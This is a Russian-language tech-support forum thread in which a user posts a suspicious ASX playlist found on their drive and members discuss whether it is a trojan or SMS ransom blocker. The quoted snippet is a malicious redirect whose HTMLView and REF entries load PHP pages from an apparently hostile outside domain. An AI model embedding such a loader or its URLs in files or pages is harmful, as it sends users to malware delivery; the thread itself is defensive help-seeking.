• Добро пожаловать на компьютерный форум Tehnari.ru. Здесь разбираемся с проблемами ПК и ноутбуков: Windows, драйверы, «железо», сборка и апгрейд, софт и безопасность. Форум работает много лет, сейчас он переехал на новый движок, но старые темы и аккаунты мы постарались сохранить максимально аккуратно.

Форум не связан с магазинами и сервисами – мы ничего не продаём и не даём «рекламу под видом совета». Отвечают обычные участники и модераторы, которые следят за порядком и качеством подсказок.

Если вы у нас впервые, загляните на страницу о проекте, чтобы узнать больше. Чтобы создавать темы и писать сообщения, сначала зарегистрируйтесь, а затем войдите под своим логином.

Не знаете, с чего начать? Создайте тему с описанием проблемы – подскажем и при необходимости перенесём её в подходящий раздел.
    Задать вопрос Новые сообщения Как правильно спросить
    Если пришли по ссылке со старого Tehnari.ru – вы на нужном месте, просто продолжайте обсуждение.

Троян?

• Автор темы Автор темы tenx
  • Дата начала Дата начала

tenx

Ученик
Почётный участник
Реакции
2
Баллы
0
Троян?

<ASX version = "3.0">
<PARAM name="HTMLView" value="http://b0urb0n.com/slv/bcde7fc4139d3be3c9fbd03639027898.php?showuser=13696835&view=Chrome&showforum=08"/>
<TITLE>Hello World!</TITLE>
<AUTHOR>Rasmus</AUTHOR>
<ENTRY>
<REF HREF="http://b0urb0n.com/slv/1accdcd3f21f57a8dc2dc88b26966bc0.php" />
</ENTRY>
</ASX>

Нашел у себя php файл с таким содержанием!НЕ подскажите что он делает

Где нашли (директория)? Какая ОС?

НА Диске D.D основной директории...странно даже как то

вы не заходили может на сайты юкоза до того?

антивирусом проверили файл \ пк?

хотя мне кажется что это код скрипта, для вставки на сайт.... который вы сами скачали...

Удалять пробовали?

Удалил.Нет это не мое.а на юкозы заходил конечно.Их же куча

тогда возможно вирус - ( кстати это мог не троян а блокиратор оказаться - если с юкоза)

Сам файл нодом проверил.ниче не нашел.и комп просканировал

А что он делает?Я чтото не очень понимаю.

Файл удалил, вирусов нет, тогда в чем проблема?

А что он делает?Я чтото не очень понимаю.
это трудный вопрос - или это скрипт ( не понятно откуда скачанный - или все же вы что то делали с скриптами ) или вирус..
если бы вы знали откуда он, то это легче было бы понять что и как...

Вирус \ Плагин блокировщик может заблокировать вашу систему - и просить СМС для разблокирования.. (ЗНАКОМО?):)

Больно просто все...

Олег, Знаком

Недавно тему создавал зайдите и посмотрите http://www.tehnari.ru/f23/t38190/

это как то относится к этой проблеме?

скрипт посылает на страничку на которой открывается якобы какая то трансляция..и попутно пытается запустить несколько процессов на компе(запускать их я не решился :) ) .....Еще кидает под сомнение надпись "Hello World" прям как будто первый раз в жизни написали скрипт:) но это явно не так..

Все ясно

Сегодня, 15:51 #13 (permalink)
Олег
Так и относится что там какой то код странный в реестре.После удаление появляется заново при загрузку винды

Этот код содержит переадресацию на другую страницу, где может быть всё, что угодно (зависит от автора). Если вы не переходили на нее - вряд ли ваши проблемы с этим php-файлом связаны.

Назад
Сверху